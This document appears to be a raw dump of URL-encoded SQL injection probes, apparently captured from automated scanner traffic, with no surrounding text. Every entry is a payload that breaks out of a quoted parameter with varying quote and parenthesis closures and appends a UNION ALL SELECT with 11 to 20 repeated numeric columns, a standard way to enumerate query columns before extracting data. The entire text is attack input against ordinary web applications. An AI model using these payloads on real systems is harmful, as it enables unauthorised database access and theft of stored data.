-3471%27%29%20UNION%20ALL%20SELECT%204538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%23 -1364%27%29%20UNION%20ALL%20SELECT%208764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%23 -8303%27%29%20UNION%20ALL%20SELECT%202108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%2C2108%23 -1067%27%29%20UNION%20ALL%20SELECT%202761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%2C2761%23 -3917%27%29%20UNION%20ALL%20SELECT%207039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%2C7039%23 -4522%27%29%20UNION%20ALL%20SELECT%203187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%23 -2203%27%29%20UNION%20ALL%20SELECT%204073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%23 -7966%27%29%20UNION%20ALL%20SELECT%208289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%2C8289%23 -8291%27%29%20UNION%20ALL%20SELECT%207414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%23 -7081%27%29%20UNION%20ALL%20SELECT%205643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%2C5643%23 -4385%27%29%29%20UNION%20ALL%20SELECT%204334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%23 -6968%27%29%29%20UNION%20ALL%20SELECT%202644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%2C2644%23 -6292%27%29%29%20UNION%20ALL%20SELECT%206299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%2C6299%23 -3908%27%29%29%20UNION%20ALL%20SELECT%202520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%23 -4945%27%29%29%20UNION%20ALL%20SELECT%208292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%23 -9902%27%29%29%20UNION%20ALL%20SELECT%203935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%2C3935%23 -7974%27%29%29%20UNION%20ALL%20SELECT%208624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%23 -5288%27%29%29%20UNION%20ALL%20SELECT%202405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%2C2405%23 -1074%27%29%29%20UNION%20ALL%20SELECT%208294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%23 -2544%27%29%29%20UNION%20ALL%20SELECT%202374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%2C2374%23 -4066%27%29%29%29%20UNION%20ALL%20SELECT%202326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%2C2326%23 -1267%27%29%29%29%20UNION%20ALL%20SELECT%202321%2C2321%2C2321%2C2321%2C2321%2C2321%2C2321%2C2321%2C2321%2C2321%2C2321%2C2321%23 -5376%27%29%29%29%20UNION%20ALL%20SELECT%205745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%2C5745%23 -9402%27%29%29%29%20UNION%20ALL%20SELECT%208031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%2C8031%23 -5421%27%29%29%29%20UNION%20ALL%20SELECT%209463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%23 -4875%27%29%29%29%20UNION%20ALL%20SELECT%207812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%23 -9442%27%29%29%29%20UNION%20ALL%20SELECT%203292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%23 -1250%27%29%29%29%20UNION%20ALL%20SELECT%206544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%23 -6629%27%29%29%29%20UNION%20ALL%20SELECT%209629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%2C9629%23 -4022%27%29%29%29%20UNION%20ALL%20SELECT%201765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%2C1765%23 -3707%27%20UNION%20ALL%20SELECT%208294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%2C8294%23 -8426%27%20UNION%20ALL%20SELECT%204590%2C4590%2C4590%2C4590%2C4590%2C4590%2C4590%2C4590%2C4590%2C4590%2C4590%2C4590%23 -2646%27%20UNION%20ALL%20SELECT%204258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%2C4258%23 -4350%27%20UNION%20ALL%20SELECT%206260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%23 -8379%27%20UNION%20ALL%20SELECT%206172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%2C6172%23 -2486%27%20UNION%20ALL%20SELECT%209567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%23 -3383%27%20UNION%20ALL%20SELECT%201599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%2C1599%23 -1327%27%20UNION%20ALL%20SELECT%204027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%23 -7264%27%20UNION%20ALL%20SELECT%207132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%2C7132%23 -9800%27%20UNION%20ALL%20SELECT%207587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%23 -2690%27%29%20UNION%20ALL%20SELECT%203608%2C3608%2C3608%2C3608%2C3608%2C3608%2C3608%2C3608%2C3608%2C3608%2C3608%23 -7600%27%29%20UNION%20ALL%20SELECT%209241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%23 -1527%27%29%20UNION%20ALL%20SELECT%209162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%23 -6320%27%29%20UNION%20ALL%20SELECT%209919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%2C9919%23 -4714%27%29%20UNION%20ALL%20SELECT%201970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%23 -3467%27%29%20UNION%20ALL%20SELECT%204799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%23 -3240%27%29%20UNION%20ALL%20SELECT%208577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%23 -4873%27%29%20UNION%20ALL%20SELECT%204466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%23 -8514%27%29%20UNION%20ALL%20SELECT%202851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%23 -6086%27%29%20UNION%20ALL%20SELECT%207849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%23 -9140%27%29%29%20UNION%20ALL%20SELECT%202901%2C2901%2C2901%2C2901%2C2901%2C2901%2C2901%2C2901%2C2901%2C2901%2C2901%23 -4676%27%29%29%20UNION%20ALL%20SELECT%206177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%23 -9234%27%29%29%20UNION%20ALL%20SELECT%205475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%2C5475%23 -9037%27%29%29%20UNION%20ALL%20SELECT%206748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%23 -1485%27%29%29%20UNION%20ALL%20SELECT%205469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%23 -7275%27%29%29%20UNION%20ALL%20SELECT%204321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%2C4321%23 -9810%27%29%29%20UNION%20ALL%20SELECT%203753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%2C3753%23 -1494%27%29%29%20UNION%20ALL%20SELECT%204287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%23 -6028%27%29%29%20UNION%20ALL%20SELECT%205684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%2C5684%23 -9644%27%29%29%20UNION%20ALL%20SELECT%205650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%2C5650%23 -6909%27%29%29%29%20UNION%20ALL%20SELECT%201123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%23 -3732%27%29%29%29%20UNION%20ALL%20SELECT%204272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%2C4272%23 -5956%27%29%29%29%20UNION%20ALL%20SELECT%201923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%23 -7358%27%29%29%29%20UNION%20ALL%20SELECT%205681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%2C5681%23 -8816%27%29%29%29%20UNION%20ALL%20SELECT%208826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%23 -3291%27%29%29%29%20UNION%20ALL%20SELECT%209219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219%23 -8237%27%29%29%29%20UNION%20ALL%20SELECT%205401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%23 -5784%27%29%29%29%20UNION%20ALL%20SELECT%201516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%23 -2241%27%29%29%29%20UNION%20ALL%20SELECT%201031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%2C1031%23 -7484%27%29%29%29%20UNION%20ALL%20SELECT%207959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%23 -4962%27%20UNION%20ALL%20SELECT%208817%2C8817%2C8817%2C8817%2C8817%2C8817%2C8817%2C8817%2C8817%2C8817%2C8817%23 -8019%27%20UNION%20ALL%20SELECT%207236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%2C7236%23 -1386%27%20UNION%20ALL%20SELECT%205950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%2C5950%23 -5337%27%20UNION%20ALL%20SELECT%209722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%2C9722%23 -6289%27%20UNION%20ALL%20SELECT%203987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%2C3987%23 -1185%27%20UNION%20ALL%20SELECT%207664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%23 -6622%27%20UNION%20ALL%20SELECT%208280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%23 -4632%27%20UNION%20ALL%20SELECT%204227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%23 -1008%27%20UNION%20ALL%20SELECT%202306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%2C2306%23 -4790%27%20UNION%20ALL%20SELECT%209016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%2C9016%23 -3804%22%29%20UNION%20ALL%20SELECT%204111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%23 -5789%22%29%20UNION%20ALL%20SELECT%203746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%23 -5030%22%29%20UNION%20ALL%20SELECT%205457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%2C5457%23 -3605%22%29%20UNION%20ALL%20SELECT%206968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%2C6968%23 -6688%22%29%20UNION%20ALL%20SELECT%206378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%2C6378%23 -6130%22%29%20UNION%20ALL%20SELECT%207731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%23 -4529%22%29%20UNION%20ALL%20SELECT%208562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%23 -4258%22%29%20UNION%20ALL%20SELECT%204644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%23 -1976%22%29%20UNION%20ALL%20SELECT%208172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%23 -4429%22%29%20UNION%20ALL%20SELECT%203405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%2C3405%23 -9940%22%29%29%20UNION%20ALL%20SELECT%208666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666%23 -1813%22%29%29%20UNION%20ALL%20SELECT%201713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%2C1713%23 -4353%22%29%29%20UNION%20ALL%20SELECT%208446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%23 -1989%22%29%29%20UNION%20ALL%20SELECT%202113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%2C2113%23 -7123%22%29%29%20UNION%20ALL%20SELECT%201161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%23 -8298%22%29%29%20UNION%20ALL%20SELECT%209736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%23 -4337%22%29%29%20UNION%20ALL%20SELECT%201206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%2C1206%23 -8584%22%29%29%20UNION%20ALL%20SELECT%208793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%23 -2037%22%29%29%20UNION%20ALL%20SELECT%204680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%2C4680%23 -2746%22%29%29%20UNION%20ALL%20SELECT%201686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%23 -1698%22%29%29%29%20UNION%20ALL%20SELECT%208496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%23 -9133%22%29%29%29%20UNION%20ALL%20SELECT%205108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%23 -4163%22%29%29%29%20UNION%20ALL%20SELECT%203250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%2C3250%23 -1558%22%29%29%29%20UNION%20ALL%20SELECT%202493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%23 -9518%22%29%29%29%20UNION%20ALL%20SELECT%201546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%2C1546%23 -6120%22%29%29%29%20UNION%20ALL%20SELECT%203997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%2C3997%23 -3213%22%29%29%29%20UNION%20ALL%20SELECT%207409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%2C7409%23 -4718%22%29%29%29%20UNION%20ALL%20SELECT%202519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%2C2519%23 -8658%22%29%29%29%20UNION%20ALL%20SELECT%209059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%2C9059%23 -3245%22%29%29%29%20UNION%20ALL%20SELECT%205140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%23 -7017%22%20UNION%20ALL%20SELECT%209891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%23 -3154%22%20UNION%20ALL%20SELECT%208973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%23 -6840%22%20UNION%20ALL%20SELECT%205211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%23 -5520%22%20UNION%20ALL%20SELECT%208148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%23 -2685%22%20UNION%20ALL%20SELECT%206645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%23 -1968%22%20UNION%20ALL%20SELECT%201822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%2C1822%23 -8387%22%20UNION%20ALL%20SELECT%208503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%23 -1910%22%20UNION%20ALL%20SELECT%207826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%2C7826%23 -5254%22%20UNION%20ALL%20SELECT%202243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%2C2243%23 -5934%22%20UNION%20ALL%20SELECT%206850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%23 -5636%22%29%20UNION%20ALL%20SELECT%205831%2C5831%2C5831%2C5831%2C5831%2C5831%2C5831%2C5831%2C5831%2C5831%2C5831%23 -8315%22%29%20UNION%20ALL%20SELECT%203869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%23 -4588%22%29%20UNION%20ALL%20SELECT%207707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%23 -4736%22%29%20UNION%20ALL%20SELECT%209878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%23 -9838%22%29%20UNION%20ALL%20SELECT%205386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%23 -1285%22%29%20UNION%20ALL%20SELECT%201520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%23 -9620%22%29%20UNION%20ALL%20SELECT%206737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%23 -9899%22%29%20UNION%20ALL%20SELECT%209436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%23 -2652%22%29%20UNION%20ALL%20SELECT%206913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%2C6913%23 -2664%22%29%20UNION%20ALL%20SELECT%204944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%2C4944%23 -3368%22%29%29%20UNION%20ALL%20SELECT%202129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%23 -6543%22%29%29%20UNION%20ALL%20SELECT%203048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%2C3048%23 -4568%22%29%29%20UNION%20ALL%20SELECT%206279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%23 -9128%22%29%29%20UNION%20ALL%20SELECT%207320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%23 -2153%22%29%29%20UNION%20ALL%20SELECT%204560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%23 -3441%22%29%29%20UNION%20ALL%20SELECT%207755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%2C7755%23 -2273%22%29%29%20UNION%20ALL%20SELECT%204918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%23 -3361%22%29%29%20UNION%20ALL%20SELECT%202240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%23 -3200%22%29%29%20UNION%20ALL%20SELECT%207310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%2C7310%23 -1637%22%29%29%20UNION%20ALL%20SELECT%204549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%2C4549%23 -6873%22%29%29%29%20UNION%20ALL%20SELECT%203019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%2C3019%23 -7310%22%29%29%29%20UNION%20ALL%20SELECT%209583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%23 -4720%22%29%29%29%20UNION%20ALL%20SELECT%203351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%2C3351%23 -5966%22%29%29%29%20UNION%20ALL%20SELECT%207315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%2C7315%23 -7437%22%29%29%29%20UNION%20ALL%20SELECT%202357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%23 -3543%22%29%29%29%20UNION%20ALL%20SELECT%205579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%23 